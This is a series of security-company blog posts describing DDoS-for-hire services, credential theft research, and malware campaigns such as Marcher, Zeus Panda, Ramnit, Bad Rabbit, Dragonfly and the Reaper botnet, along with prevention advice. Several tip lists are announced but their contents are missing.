Beware of DDoS-for-Hire
Distributed-denial-of-service (DDoS) attacks have become a public menace.
DDoS was once a tool used by hactivists to further their social or political ends. In recent years, DDoS has become a toll for purely financial gain and for utter destruction. DDoS-for-hire services, also known as stressers or booters, have grown in recent years.
One DDoS-for-hire organization offers its DDoS service for a monthly fee of $7. A simple online search using the keyword “stressers” or “booters” will yield a number of organizations offering DDoS services for a fee. One DDoS mobile app even showed up on Google Play but this one was immediately pulled out.
Many of these DDoS-for-hire services openly advertise their services on the guise of offering a legitimate DDoS service. The reality is that it’s not illegal to conduct a DDoS attack or stress test on a website, for instance, to test the capacity of the site to receive high volume of traffic or to test how to deflect unwanted volume of traffic. The question of legitimacy comes on whether or not the owner of the website authorizes the stress test.
According to the FBI, the hiring of stresser or booter service to carry out a DDoS attack to take down a website is punishable under the US law called “Computer Fraud and Abuse Act” and this may result in any one or a combination of the following: seizure of computers and other electronic devices, arrest and criminal prosecution, significant prison sentence, penalty or fine.
“Booter and stresser services are a form of DDoS-for-hire – advertised in forum communications and available on Dark Web marketplaces – offering malicious actors the ability to anonymously attack any Internet-connected target,” the FBI said. “These services are obtained through a monetary transaction, usually in the form of online payment services and virtual currency.”
What Can a DDoS-for-Hire Service Actually Do?
The Gammel case is the first Minnesota case to address the DDoS-for-hire cybercrime. In April of this year, in a criminal complaint filed before the US District Court of Minnesota, the Federal Bureau of Investigation (FBI) alleged that Gammel, a former employee of Washburn Computer Group – a Minnesota-based company – paid several DDoS-for-hire services to bring down 3 websites of Washburn in a more than one-year-long DDoS campaign.
According to the FBI, the first 2 websites of Washburn were knocked down several times as a result of the DDoS attacks paid by Gammel. The FBI also alleged that the 3rd website – the one that replaced the 2 other sites of Washburn – was knocked down several times as well a result of the DDoS orchestrated by Gammel. Washburn claimed that the DDoS attacks resulted in a minimum of $15,000 in loss.
In the criminal complaint, the FBI defined DDoS attack as "an attempt to make a machine or network resource unavailable to its intended users, such as by temporarily or indefinitely interrupting or suspending services of a host connected to the Internet, usually by shutting down a website or websites connected to target of the DDoS attack.”
The DDoS attacks against Dyn – a domain name service (DNS) provider to which many websites rely on – was considered as one of the largest. Because of the DDoS attacks against Dyn, 80 widely used websites like Twitter, Amazon, Tumblr, Reddit, Spotify and Netflix were rendered temporarily inaccessible to the public.
“The [Dyn] attack used a booter service and was attributed to infected Internet of Things (IoT) devices like routers, digital video recorders, and Webcams/security cameras to execute the DDoS attack,” the FBI said.
According to the FBI source, the DNS provider lost approximately 8% of its customers following the DDoS attacks.
How a DDoS Attack Works?
In the Dyn case, the company itself confirmed that the Mirai botnet was the primary source of DDoS attacks although it won't comment about the motivation or the identity of the attackers.
According to Dyn, on October 21, 2016, it observed a high volume of traffic on 2 occasions in its Managed DNS platform in the Asia Pacific, South America, Eastern Europe and US-West regions. The company said that the 2 major DDoS attacks on its Managed DNS platform involved 100,000 compromised IoT devices originating from different parts of the globe that were infected by the Mirai botnet.
The Mirai botnet works by infecting IoT devices with weak security – those that use default usernames and passwords – and turned them into bots or robots that can be ordered around, in this case, to conduct DDoS attacks.
The effects of malicious and unauthorized DDoS attacks are immediate. They render targeted websites inaccessible or slow. As experienced by Washburn and Dyn, DDoS attacks proved to be costly and can cause businesses to lose customers.
Availability of DDoS Tools
The danger of DDoS attacks is the tools for this cybermenace aren’t just available from the DDoS-for-hire services themselves but from public sources. For instance, one can conduct a DDoS attack on his or her own using the Mirai botnet as the source code of this was made available in September of this year to the public by someone who calls himself or herself “Anna-senpai”.
DDoS tools are also evolving. Just days after the online publication of the Mirai source code, a new DDoS tool called “Reaper” emerged. This DDoS tool hasn’t attacked yet as it’s still in the process of infecting vulnerable IoT devices. The stark difference between the 2 DDoS tools is that while the Mirai infected 100,000 IoT devices, the Reaper has infected over half a million IoT devices. This means that this new botnet is much more powerful.
While it’s cheap to hire malicious cyberactors to conduct DDoS attacks, it’s equally affordable to hire professionals to prevent DDoS attacks. Contact us today if your company is currently burdened by this cybermenace or if your organization simply wants to be proactive in stopping DDoS attacks.
How to Prevent Account Takeover or Hijacking
A new study conducted by Google and University of California (UC) delved into the question which among these three cyberattacks – phishing, keylogging and third-party data breach – most likely results in account takeover or hijacking.
From March 2016 to March 2017, researchers at Google and UC examined 12.4 million potential victims of phishing kits, 788,000 potential victims of keyloggers and 1.9 billion usernames and passwords exposed via third-party data breaches traded on the black market.
The Google and UC study found that victims of phishing kits are more likely to have their account taken over by cybercriminals as these kits harvest the same information that Google uses in verifying every time a user logs into his or her email account. Details that are harvested by phishing kits include the victim's secret questions, geolocation, phone numbers and device identifiers.
The study found that accounts of victims of phishing are 400 times more likely to be successfully hijacked compared to a random Google user. The likelihood of account takeover is far lesser for keylogger victims (40 times likely to be hijacked) and third-party data breach victims (10 times). Researchers found 25,000 blackhat tools used for phishing and keylogging.
“We find that the risk of a full email takeover depends significantly on how attackers first acquire a victim’s (re-used) credentials,” the researchers wrote in their paper “Data Breaches, Phishing, or Malware? Understanding the Risks of Stolen Credentials”. “Using Google as a case study, we observe only 7% of victims in third party data breaches have their current Google password exposed, compared to 12% of keylogger victims and 25% of phishing victims.”
Once an account is taken over, the attacker can download all of the victim’s private data; remotely wipe the victim’s data and backups; impersonate the victim; reset the victim’s passwords and use this hijacked account as a stepping stone to access the victim’s other online accounts.
Third-Party Data Breach
Most of the 1.9 billion usernames and passwords exposed via third-party data breaches in the Google and UC study came from MySpace, Badoo, Adobe, LinkedIn, VK, Tumblr and Dropbox. The study revealed that the passwords listed below are the most commonly used passwords by victims of phishing, keylogging and third-party data breach:
These data leaks which date back to 2012–2014 appeared in public
blackhat forums, paste sites and sites like leakedsources.com, leakbase.pw and breachalarm.com – sites that charge those who would like to find out if their accounts are compromised. Victims of third-party data breach were mostly from the US (39%), India (8%) and Brazil (2.6%).
The importance of an account, in particular, an email address and its login details can’t be undermined. “As the digital footprint of Internet users expands to encompass social networks, financial records, and data stored in the cloud, often a single account underpins the security of this entire identity – an email address,” the researchers said.
The phishing kit referred to in the Google and UC study refers to prepackaged fake login page for a popular site like Gmail, Yahoo and online banking. Phishing kits are often uploaded to compromised websites and automatically harvest credentials of victims. Researchers found that phishing kit variants were uploaded to fake login pages of Yahoo, Hotmail, Gmail, Workspace Webmail, Dropbox, Google Drive, Docusign, ZoomInfo, Office 365 and AOL.
The study showed that the most popular phishing kit that utilized fake login pages for popular email providers – Yahoo, Hotmail, AOL and Gmail – generated 1,448,890 stolen credentials. Based on the last sign-in to email accounts receiving stolen credentials, the top 3 phishing kit users are those from Nigeria (41%), United States (11%) and Morocco (7.6%). Victims of phishing were mostly from the US (50%), South Africa (4%) and Canada (3%).
Google in a blog post said, “By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.”
Of the three forms of cyberattacks – phishing, keylogging and third-party data reach, phishing is the most destructive as this doesn’t only yield a password, but other sensitive data that Google itself may ask when verifying an account of a holder such as IP address, location, phone numbers and device model.
Keylogger is a malicious software that tracks and records every keystroke entry you make on your computer and often without your knowledge or permission. Attackers use keyloggers to capture sensitive data like financial information or passwords, which are then sent to third parties for criminal use. Keyloggers can steal your on-device passwords, harvest clipboard content, screenshot your online activities and monitor your keystrokes.
Based on the study, the top 10 keylogger families are the following: HawkEye, Cyborg Logger, Predator Pain, Limitless Stealer, iSpy Keylogger, Olympic Vision, Unknown Logger, Saint Andrew’s, Infinity Logger and Redpill Spy. HawkEye, in particular, sent over 400,000 snooping reports to 470 emails believed to be managed by attackers.
The top keylogger users based on the last sign-in to email accounts receiving stolen credentials came from Nigeria (11%), Brazil (7.8%) and Senegal (7.3%). Victims of keyloggers were mostly from Brazil (18%), India (10%) and US (8%).
Here are some of the ways to stop account takeover or hijacking:
Attackers have already known our “1234567” and “password” passwords. It’s time to use less obvious passwords. Cybersecurity, however, needs to move beyond strong passwords.
To ward off attackers, many online businesses today safeguard their accounts through two-factor authentication. Two-factor authentication is when you use something you know, for example a password, and also something you have, for example a smartphone, whereby after entering your password, you either received an SMS with an additional code, or will use an app to get the code to finalize the logon process. In addition, some online software providers and social networks already force a multi-step authentication. For instance, when Google detects that you logged in into your account from a different device or different location, it will ask additional information only you would know, before granting access.
As shown by the destructive nature of phishing, even a two-way factor authentication isn’t enough to ward off attackers as they can harvest sensitive information that Google itself may require when verifying an account.
Contact us today to learn more about how to protect your enterprise accounts from takeover or hijacking.
New Marcher Malware Victimized Android Users in a 3-in-1 Scheme
Attackers today are taking their time to get what they want. Researchers at Proofpoint revealed that threat actors or actor since the early part of this year has been siphoning bank details of victims in a prolong attack dubbed by some as “triple threat”.
According to Proofpoint, the threat actor since January of this year has been targeting customers of Bank Austria, Raiffeisen Meine Bank and Sparkasse Bank by employing three hacking tactics. The description below shows how personal and bank details of nearly 20,000 bank customers in Austria were stolen by the threat actor using these three hacking tactics: malicious emails, malicious websites and malicious software.
Step 1: Malicious Email
The threat actor’s point of entry in attacking the victim is through a malicious email. When this email is opened by the victim using an Android phone, the victim is exposed to a malicious link. The email link is a bit.ly shortened link, aimed at evading detection.
Step 2: Malicious Site
Once the malicious link is clicked, the victim is redirected to a phishing site – a fake site that copies the layout and content of a landing page of a bank – that asks for an account number and PIN. The image below is an example of the phishing site that copies branding from Bank Austria.
The URL addresses of the phishing sites have "bankaustria" words on it, fooling victims into thinking that they're inside the real Bank of Austria website. Here are some of the malicious URL addresses:
Once the victim enters his or her banking account information on the fake landing page, he or she is then directed to a page that asks email address and phone number. Below is a sample of the page that asks for the email address and phone number.
Step 3: Marcher Malware Infection
Once the attacker siphoned the banking and personal information of the victim, the victim is then asked to download a fake mobile app of a targeted bank. The message below is shown to the victim.
Proofpoint provides the following translation for the message above.
***Start of Translation***
The system has detected that the Bank Austria Security App is not installed on your smartphone. Due to new EU money laundering guidelines, the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system.
Please install the app immediately to avoid blocking your account.
Follow the instructions at the bottom of this page.
Why you need the Bank Austria Security App:
Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted.
Our security app allows us to transmit this sensitive data encrypted to you, thus increasing the security that you will not suffer any financial loss.
Step 1: Download Bank Austria Security App
Download the Bank Austria security app to your Android device. To do this, open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code.
After this message, the victim is then shown additional instructions in installing the bank's fake mobile app. Below is the screencap of the additional instruction and corresponding translation by Proofpoint.
***Start of Translation***
Step 2: Allow installation
Open your device's settings, select Security or Applications (depending on the device), and check Unknown sources.
Step 3: Run installation
Start the Bank Austria security app from the notifications or your download folder, tap Install.
After successful installation, tap Open and enable the device administrator. Finished!
Once the fake app is installed on the victim's Android phone, the bank's icon can be seen on the home screen of the victim's phone. When the app is used for the first time, the victim is asked to provide his or her credit card number and other personally identifiable information, such as date of birth, address, phone number, password, purportedly for authentication.
From the malicious email to the malicious sites, fake bank app, the real bank’s branding is copied, causing the victims to throw away their caution. Victims believed that they’ve downloaded the real mobile app of their bank. They instead downloaded the new version of the malicious software (malware) called “Android.Fakebank.B”, also known as Marcher.
Marcher malware is an Android-specific malicious software. It was first observed in the wild in October 2013. An older version of Marcher malware came with a call-barring functionality. This functionality was aimed at stopping customers of South Korean and Russian banks from canceling their payment cards that the Marcher malware itself stole. Once installed, this particular version of Marcher malware registers a BroadcastReceiver component that’s triggered every time the victim tries to make an outgoing call. The malware automatically cancels the call once it determines that the victim is calling any of the customer service call centers of the target banks.
Another version of the Marcher malware came with a text message spoofing functionality. Once installed into the victim’s Android phone, this specific Marcher malware spoofs a text message from the targeted bank asking the user to verify a fraudulent transaction. This tricks the victim into logging into a fake mobile app of a bank.
How to Prevent Marcher Malware Attacks
“As on the desktop, mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites,” researchers at Proofpoint said. “Unusual domains, the use of URL shorteners, and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware.
Here are some additional tips to further protect your Android phone from Marcher malware:
Hackers Use Google Search Results to Spread Malware
Cybercriminals are continually finding new ways to distribute their malicious software. This time, they took advantage of Google search results in spreading their malware.
Researchers at Cisco discovered that Google search results are being used by cybercriminals for spreading their malware. Cybercriminals took advantage of the links provided by Google search results in spreading the new version of the banking malware dubbed as “Zeus Panda”, also known as “Panda Banker”.
Google search is the digital world’s go-to place whenever we want to know something. Google answers our questions by providing links that it believes (based on its algorithm or criteria) are the best responses to our queries.
Billions of people around the world are using Google search. According to StatCounter, a Dublin-based web tracking service, as of October 2017, Google received the bulk of the search engine market share worldwide (91.47%), followed by Bing (2.75%), Yahoo (2.25%) and Baidu (1.8%).
Zeus Panda, the malware distributed by the threat actors via malicious links on Google search, is a malware that borrows some of the code of another malware called “Zeus” – a malware that first appeared in 2007. Cybercriminals have since earned hundreds of millions of dollars using the Zeus malware by stealing banking credentials and generating fraudulent banking transactions.
How Zeus Panda Spreads via Google Search ResultsIn order that these malicious links show up on the first page of Google search results, threat actors used the process called “SEO”, short for search engine optimization. Google, for its part, allows legitimate SEO – referred to as "whitehat" SEO. One of the legitimate SEO techniques used by the threat actors is the use of targeted banking related keywords to zero in their target victims.
“By targeting primarily financial-related keyword searches and ensuring that their malicious results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc.,” Cisco researchers said.
Threat actors, for instance, used the banking related keywords "al rajhi bank working hours during ramadan". The screencap below from Cisco researchers shows one of the top links in the Google search results for the above-mentioned keywords.
Below are the other keywords used by the threat actors:
"nordea sweden bank account number"
"how many digits in karur vysya bank account number"
"how to cancel a cheque commonwealth bank"
"salary slip format in excel with formula free download"
"bank of baroda account balance check"
"bank guarantee format mt760"
"sbi bank recurring deposit form"
"axis bank mobile banking download link"
As can be gleaned from the above-mentioned keywords, certain geographic regions appear to be directly targeted, with many of these keywords targeting users trying to search about financial institutions in India as well as the Middle East. The treat actors compromised business websites that have received high number of reviews and high ratings to appear legitimate to victims. Once a victim clicks on this compromised link, a multi-stage malware infection process is then initiated.
As shown below, the victim is redirected to a compromised site that shows a fake alert from Windows Defender that the Zeus virus is detected.
Once the victim clicks the “OK” button, the victim is once again redirected to another compromised site which hosts a malicious Word document as shown below.
Clicking on the "Enable Editing" and click "Enable Content" will initiate the downloading of the new version of Zeus Panda malware into the victim's computer.
This new version of Zeus Panda shares many characteristics of its predecessor Zeus Panda. Both borrowed the code of Zeus malware – the creator of which released the source code to the public in 2011. Both are designed to steal banking and other sensitive credentials and conduct fraudulent banking transactions.
Zeus Panda malware was first discovered by the researcher only known as “Fox IT” in February 2016. As reported by Proofpoint, this early version of Zeus Panda stole banking credentials of customers from European and Australian banks, UK online casinos and international online payment systems.
Unlike the new version of the malware which uses Google search results to spread the malware, the older version of Zeus Panda was spread using malicious email attachments, malicious email links and web injects.
In August 2016, Proofpoint found that millions of emails were sent to organizations involved in manufacturing, retail, insurance and related sector. The email messages masquerading as coming from legitimate banks contained malicious links leading to Microsoft Word documents. These documents contain macros which, if enabled, download Zeus Panda malware.
In October of this year, IBM reported that customers in North America were targeted by the Zeus Panda malware. For this October 2017 campaign, IBM said, the threat actors distributed the malware via malicious emails purporting to come from courier services like UPS. These fake emails, according to IBM, contain embedded links that lead the recipient to a site infected by Zeus Panda malware.
According to Proofpoint, the early version of Zeus Panda was also spread using web injects – a process by which cybercriminals intercept online banking traffic and modify banking sites on infected computers in order to carry out man-in-the-browser (MITB) attacks. In carrying out MITB attacks, threat actors infect a web browser to modify web pages of banks, online casinos and international online payment systems and modify the transaction content.
How to Prevent Zeus Panda Attacks
In order to prevent being a victim of the Zeus Panda malware, it’s important to think twice before clicking anything online and opening an email attachment. As shown by the new version of Zeus Panda, it’s important to remain discerning and vigilant in the results of a Google search.
Cisco researchers who discovered the new version of Zeus Panda said, “Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape.”
Ramnit Malware Makes a Comeback via Google Play
Ramnit, the once notorious malware that infected 3.2 million computers around the world, has resurfaced via infected apps on Google Play.
Symantec researchers found 92 distinct apps on Google Play with a total of 250,000 downloads laden with Ramnit malware. Some of the Ramnit-infected apps that turned up on Google Play were educational and tutorial apps.
Symantec informed Google of the presence of these infected apps and the company has removed them from the app store. This isn’t the first time that Ramnit-infected apps have turned up on Google Play. In March of this year, more than 100 Ramnit-infected apps were similarly removed from Google Play.
Ramnit first appeared in the wild in 2010. In February 2015, a law enforcement operation led by the European Union Agency for Law Enforcement Cooperation (Europol) crippled the operation of the cybercrime group behind Ramnit by shutting down the command and control servers, as well as shutting down and 300 internet domain addresses used by the group. At the time, the group already infected 3.2 million computers in total and defrauding undetermined large number of victims.
The law enforcement operation against the group behind Ramnit was participated by investigators from Germany, Italy, the Netherlands and the UK. Representatives from the private industry like Symantec and Microsoft were also involved in the law enforcement operation.
Ramnit is a multi-feature cybercrime tool. It compromised a victim in the following manner:
This malware monitors web browsing activities and detects when certain websites like online banking sites are visited. Ramnit can inject itself into the web browser and alter the website of the bank to make it appear that the bank is asking the user additional information like credit card details.
This malware can hijack online banking sessions. Ramnit attackers achieve this by stealing session cookies from web browsers and by using the stolen cookies to impersonate victims to authenticate themselves on websites.
This malware scans computer’s hard drive. It’s configured in such a way to search for specific folders that are considered likely to contain sensitive information like passwords.
This malware can gain remote access – upload, download, or delete files and execute commands – on the victim’s computer in two ways: by connecting to an anonymous FTP server and by Virtual network computing (VNC) module.
Ramnit is a persistent cyber threat. The malware’s creators made sure that once a computer is infected it’ll be difficult to remove the malware from the compromised computer.
Once the malware is installed on the compromised computer, it copies itself to the computer’s memory, hard drive and removable drive. The malware’s version that’s copied to the computer’s memory checks the hard disk-based copy of the malware. If the memory-based copy of the malware detects that the hard disk-based copy has been quarantined or removed, it’ll create another malware copy for the hard disk to sustain the infection.
Microsoft describes Ramnit malware this way: "This malware family steals your sensitive information, such as your bank user names and passwords. It can also give a malicious hacker access and control of your PC, and stop your security software from running."
How Ramnit Spreads
While the latest method of propagation of Ramnit is via Android apps, this doesn’t, however, mean that this malware works with Android devices. Since its appearance in 2010, this malware has always been a threat to computers using Windows as an operating system.
Ramnit won’t run on your Android device even if you’ve the misfortune of downloading a Ramnit-infected app on Google Play. In order for the Windows infection to happen, an Android device loaded with a Ramnit-infected app has to be connected to a Windows computer. Once the malware compromised a Windows computer, it searches for all exe, .dll, .htm, and .html files on any removable drives like USB drive and the local hard disk and infects them by making copies of itself.
“The HTML file infection process uses two tactics: injecting VBScript code into an HTML page that drops and executes the worm, and also injecting a hidden iframe into HTML files that downloads a remote file if the page is opened in a browser,” Symantec said.
Ramnit malware is one of the reasons why it’s unsafe to use or borrow removable drive or USB flash drive of another. You never know, this USB drive may be laden with the Ramnit malware.
In addition to propagating the malware through infected apps and through infected removable drives, Ramnit attackers also spread the malware through malicious emails and exploit kits served through malicious advertisements on social media pages and websites. Public FTP servers are also used by Ramnit attackers to distribute the malware. The Europol considers Ramnit as a botnet.
“This botnet – a term used to describe a network of infected computers - was used by the criminals running it to gain remote access and control of the infected computers, enabling them to steal personal and banking information, namely passwords, and disable antivirus protection,” Europol said. “This malware, infecting users running Windows operating systems, explored different infection vectors such as links contained in spam emails or by visiting infected websites.”
"Despite the setback many years ago, Ramnit’s operators have not completely gone away and there also seem to be many latent infections worldwide,” Symantec said. “We know that Google has a system in place for vetting uploaded apps, but we don’t have visibility into the processes for vetting submitted apps, so we can’t say for sure why these infected apps are getting through the vetting process.”
How to Prevent Ramnit Attacks
According to Microsoft, Windows Defender Antivirus detects and removes Ramnit malware.
Here are additional tips for preventing Ramnit attacks:
Bad Rabbit Ransomware, New variant of NotPetya, Is Spreading
Bad Rabbit ransomware, a new variant of NotPetya, is spreading across Eastern Europe and other parts of the world.
According to the Russian News Agency TASS, Bad Rabbit ransomware attacked the Russian mass media and Ukraine’s airport and subway. Symantec reported that Bad Rabbit primarily attacked Russia (86%), followed by Japan (3%) Bulgaria (2%), Ukraine (1%), US (1%) and all other countries (7%).
NotPetya versus Bad Rabbit
NotPetya is a malicious software (malware) that was released into the wild in June of this year. It wreaked havoc to thousands of computers worldwide, including Belgium, Brazil, Germany, Russia and the US. Merck, Nuance Communications, FedEx are some of the victims of NotPetya.
Similar to NotPetya, users of computers infected by Bad Rabbit received a notice that their files are encrypted. Both malware have the same style of ransom note, suggesting to victims to pay certain amount to get access to files. Both are worms, which mean that they’ve the ability to self-propagate – self-reproduce by infecting other computers in the network.
One stark difference between NotPetya and Bad Rabbit is the use of self-propagation tools. While NotPetya self-propagates using EternalBlue and EternalRomance, Bad Rabbit self-propagates by only using EternalRomance.
EternalBlue and EternalRomance are just two of the many exploits released in April of this year by the group called “Shadow Brokers”. The group claimed that EternalBlue, EternalRomance and the other hacking tools they’ve released were used by the National Security Agency (NSA) in exploiting the vulnerabilities in Windows operating system. According to Microsoft, it released a security update or patch dated March 17, 2017, fixing the vulnerabilities exposed by Shadow Brokers.
The second difference between NotPetya and Bad Rabbit is that NotPetya is a “wiper” rather than a ransomware. A wiper’s aim is to wipe out or delete all computer files for good, while ransomware’s aim is to generate money from victims. None of the victims of NotPetya were able to unlock their encrypted files. According to Symantec, its analysis of Bad Rabbit confirms that it’s not a wiper as the encrypted files can be recovered if the key is known.
How Bad Rabbit Works
Bad Rabbit infects victims’ computers in the following manner:
The first contact of victims of Bad Rabbit is via watering holes – legitimate websites that are altered by cybercriminals. Bad Rabbit compromised many popular websites in the affected countries.
Once a victim visits one of these compromised sites, Bad Rabbit malware is dropped or downloaded into the victim's computer as a fake software update to Adobe Flash Player.
Bad Rabbit malware masquerading as an update to Flash Player enters the victim’s computer by employing social engineering – convincing the victim that there’s a need to update his or her Flash Player. In the middle of the computer screen, a popup shows up asking the user to download an update for Flash Player.
Once the fake Adobe Flash Player "Install" button is clicked, the Bad Rabbit malware drops five open-sourced tools described below into the victim’s computer. According to Symantec, the download originates from a particular domain. It’s possible though that victims may have been redirected there from another compromised sites, Symantec said.
Mimikatz is an open-sourced tool used for changing privileges and recovering Windows passwords in plaintext.
In addition to Mimikatz, Bad Rabbit also uses a hardcoded list of commonly used default passwords in attempting to guess Windows passwords.
ReactOS is an open-sourced tool that’s used as an alternative to Windows operating system. The use of ReactOS, according to Symantec, reduces the amount of detectable suspicious activity on an infected computer.
DiskCryptor is an open-sourced tool that’s used to perform encryption. After individual files in the victim’s computer are encrypted, Bad Rabbit will then conduct a full disk encryption. Once the system is restarted, a ransom note is displayed, demanding a ransom amounting to 0.05 Bitcoin (US$280).
Bad Rabbit spreads to other vulnerable computers in the network by using EternalRomance, an exploit that bypasses security over Server Message Block (SMB) – referred to as the transport protocol used by computers using Windows operating system for a variety of purposes, including file sharing, printer sharing and access to remote Windows services.
According to researchers at RiskIQ, long before the distribution of Bad Rabbit ransomware last October 24th, cyber attackers have already compromised the affected websites used as watering holes. The researchers said that they “can track the distribution vector back to early 2016 showing that victims were compromised long before the ransomware struck.”
"The thing we do not understand at this point is why they decided to burn this information position to mass distribute the Bad Rabbit ransomware rather than save it for another type of malware," RiskIQ researchers said.
How to Prevent Bad Rabbit Attacks
As Bad Rabbit uses factory or default passwords, it’s important to protect your computer with a strong password. This security measure, however, isn’t enough to protect you from Bad Rabbit.
Bad Rabbit self-propagates by using the hacking tool EternalRomance. A security update or patch that stops EternalRomance has already been made available by Microsoft since March 17, 2017.
"Using unpatched and unsupported software may increase the risk of proliferation of cybersecurity threats, such as ransomware,"
In an effort to keep your all software up-to-date, be careful though of falling into traps of fake updates.
Fake Adobe Flash Player update has long been the favorite of many cyber criminals as they always find security vulnerabilities of this software. If an update pops up in your monitor, don’t click the button, and visit the official Adobe website for updates.
Cyber Espionage Group Targets Critical Infrastructure Using Old Hacking Tactics
Cyberattacks against critical infrastructure – energy, nuclear, water, aviation and critical manufacturing sectors – in the US have been going on since May 2017, the US Computer Emergency Readiness Team (US-CERT) said in a rare technical alert notice.
Symantec, on the other hand, reported that cyberattacks against the energy infrastructure in some European countries and in the US have been underway since December 2015. Cisco researchers, meanwhile, reported that since at least May 2017, they have observed attackers targeting critical infrastructure and energy companies around the world, in particular, Europe and the US.
While US-CERT and Cisco didn’t name a particular group responsible for the ongoing cyberattacks against critical infrastructure, Symantec identifies the threat actors collectively known as “Dragonfly” as the group behind the cyberattacks against the energy sector. Symantec researchers said the group has been in operation since at least 2011.
Symantec dubbed Dragonfly’s latest campaign against the energy sector as “Dragonfly 2.0”, a campaign that started in late 2015 the most notable cyberattack of which was the attack against Ukraine’s power system in 2015 and 2016, resulting in power outages affecting hundreds of thousands of residents.
The US-CERT technical alert – the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI), and the reports from Symantec and Cisco showed that old hacking tactics have been employed by the threat group.
Methods of Cyber Attacks
1. Malicious Emails
According to US-CERT, the threat group used malicious emails or phishing emails with the subject line such as “AGREEMENT & Confidential”. The group also used malicious Microsoft Word attachments that appear to be legitimate invitations, policy documents or curricula vitae for industrial control systems personnel to lure users to open the attachment, US-CERT said.
According to Symantec, one example of the malicious email campaign used by the threat group were emails disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.
Cisco researchers identified an email-based attack called "Phishery", targeting the energy sector, including nuclear power. Phishery became publicly available on GitHub in late 2016
“Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code,” Cisco researchers said. “In this case, there is no malicious code in the attachment itself. The attachment instead tries to download a template file over an SMB connection so that the user's credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim's computer.”
2. Watering Holes
According to US-CERT and Symantec, the cyber espionage group used "watering holes" – websites that have legitimate content by reputable organizations but are altered by the threat group to have malicious content. Almost half of the known watering holes, the US Computer Emergency Readiness Team said, are reputable websites that offer information to those in the critical infrastructure sector.
“As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials, by compromising websites that were likely to be visited by those involved in the energy sector,” Symantec said.
3. Social Engineering
These stolen network credentials, according to Symantec, were then used for follow-up attacks on the target critical infrastructure organization itself by delivering trojanized software – malicious software that’s disguised as legitimate software.
One of the trojans used by Dragonfly group is Karagany.B – malicious software that infiltrates computer systems of target organizations by masquerading as Flash updates. The group here used the old hacking tactic of social engineering – convincing victims they need to download software, in this case, an update for their Flash player.
The trojan Karagany.B enables attackers remote access to the victims’ computer systems and allows them to install additional malicious tools if needed. Another trojan used by the group, according to Symantec, is the trojan Heriplor – malicious software that also enables attackers remote access to the victims’ computer systems.
“Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is behind the more recent attacks,” Symantec said. “This custom malware is not available on the black market, and has not been observed being used by any other known attack groups.”
Symantec noted that Dragonfly’s origins cannot definitively be determined. While some of Dragonfly’s malware codes were written in Russian and French, Symantec noted, this could be a way to mislead people.
How to Prevent Dragonfly Attacks
To prevent Dragonfly attacks, the US-CERT recommends the following:
Reaper IoT Botnet Threatens to Take Down Websites
Reaper IoT botnet, considered as more powerful than the Mirai botnet, is spreading worldwide and threatens to take down websites.
According to Check Point researchers, the Reaper botnet already infected one million IoT devices worldwide. "So far we estimate over a million organizations have already been affected worldwide, including the US, Australia and everywhere in between, and the number is only increasing," Check Point researchers said.
Researchers at Qihoo 360 Netlab, meanwhile, reported that the number of “vulnerable devices in one c2 queue waiting to be infected” reached over 2 million.
IoT botnet refers to internet-connected smart devices which are infected by one malware and is controlled by a cyber criminal from a remote location. It’s typically used by cyber criminals to launch a distributed denial-of-service (DDoS) attack.
“In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer,” the United States Computer Emergency Readiness Team (US-CERT) defines DDoS attack. “By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses.”
Infecting millions of IoT devices with a malware is a time-consuming task. Cyber criminals found a way to automate this task by creating a botnet – an army of infected IoT devices. The Reaper malware, as well as the Mirai malware, is spread by the IoT devices themselves. After infecting a particular IoT device, this infected device starts to look for other devices to infect.
The Mirai botnet in October 2016 brought down major websites – including Twitter, Spotify and Reddit – by launching a DDoS attack against the DNS infrastructure of New Hampshire-based company Dyn. Many major websites rely on Dyn’s internet infrastructure.
Reaper Botnet versus Mira Botnet
While the Reaper botnet shares similar characteristics with Mirai, it differs in many ways with the Mirai botnet. On September 30, 2016, the attacker known as “Anna-senpai” publicly released the source code of Mirai. According to Check Point and Qihoo 360 Netlab researchers, Reaper borrows some of the source code of Mirai, but this new botnet is significantly different from Mirai in several key behaviors.
Here are some of the differences between Reaper and Mirai:
1. Number of Affected IoT Devices
The first difference between the Reaper botnet and Mirai botnet is in terms of the number of affected IoT devices. Mirai affected about 500,000 IoT devices, while Reaper has infected over a million IoT devices.
2. Means of Infecting IoT Devices
Mirai was able to infect hundreds of thousands of IoT devices by exploiting the lax attitude of IoT users of not changing the factory or default login and password details. By using default login and password details, Mirai attackers were able to infect a massive number of IoT devices.
On the hand, Reaper’s means of infecting IoT are by exploiting several IoT vulnerabilities which the devices’ manufacturers may or may not have issued security updates or patches. Reaper attackers can, therefore, infect IoT devices even if a strong password is used as the means of entry to the device is by exploiting known software vulnerabilities.
According to Check Point researchers, the Reaper, for instance, infects unpatched wireless IP cameras by exploiting the “CVE-2017-8225” vulnerability.
3. Botnet Capabilities
Mirai already showed what it can do: It brought down major websites worldwide even for just a few hours. For Reaper, it’s still unclear what it wants to do. As of this writing, Reaper’s creator or creators just want (based on the code they wrote) to infect as many IoT devices without yet writing the command to attack any internet infrastructure or websites.
